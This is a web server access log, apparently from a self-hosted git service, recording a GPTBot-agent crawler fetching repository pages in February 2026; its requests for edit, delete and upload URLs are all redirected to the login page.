+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:35:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:35:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13869] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12540] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13306] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 19640] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" +[17/Feb/2026:16:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12018] [Gzip 6.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35839] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:36:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" +[17/Feb/2026:16:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/index.html" +[17/Feb/2026:16:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 1418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 953] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13052] [Gzip 6.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 26204] [Gzip 10.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:36:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:36:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 8207] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 10261] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 1937] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 14301] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 10058] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11931] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:36:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:36:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:36:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:36:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:36:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:36:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 